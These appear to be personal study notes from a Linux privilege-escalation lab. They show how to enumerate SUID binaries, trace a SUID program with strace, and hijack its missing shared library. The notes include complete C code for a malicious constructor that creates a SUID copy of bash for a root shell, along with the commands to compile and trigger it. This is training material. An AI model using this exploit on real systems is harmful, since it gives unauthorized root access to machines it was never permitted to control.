how to find:
find / -type f -perm -04000 -ls 2>/dev/nullresult:
809081 40 -rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
812578 172 -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
810173 36 -rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
812578 172 -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit
809080 44 -rwsr-xr-x 1 root root 43280 Jun 18 2020 /usr/bin/passwd
809078 64 -rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
809077 40 -rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
816764 8 -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
815723 948 -rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
832517 8 -rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
832743 212 -rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign
812623 12 -rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown
473324 36 -rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
473323 36 -rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
473292 84 -rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
473312 36 -rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
473290 60 -rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
465223 100 -rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfsSO Injection
this one is suid-so. why?
/usr/local/bin/suid-sostrace: debugging, see what the program does
how to strace?
strace /usr/local/bin/suid-so 2>&1it shows that it’s looking for some files that don’t exist
cleaner output:
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"we can see what the program tries to run that doesn’t exist so we can override it with something that gives us higher privileges.
for example:
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)we can check:
ls -la /home/user/.config/libcalc.sono such
ls -la /home/user/.configno such
ls -la /home/user/this is our user’s home folder, we have write access to it. We can create the file that doesn’t exist with malicious code (that priv escs)
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}we copy bash to temp and give it perms (SUID) and run it
in this case, we make a folder and file:
cd /home/user/
mkdir .config
nano libcalc.c
ctrl+x
ygcc:
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.cthen run the suid-so again:
/usr/local/bin/suid-so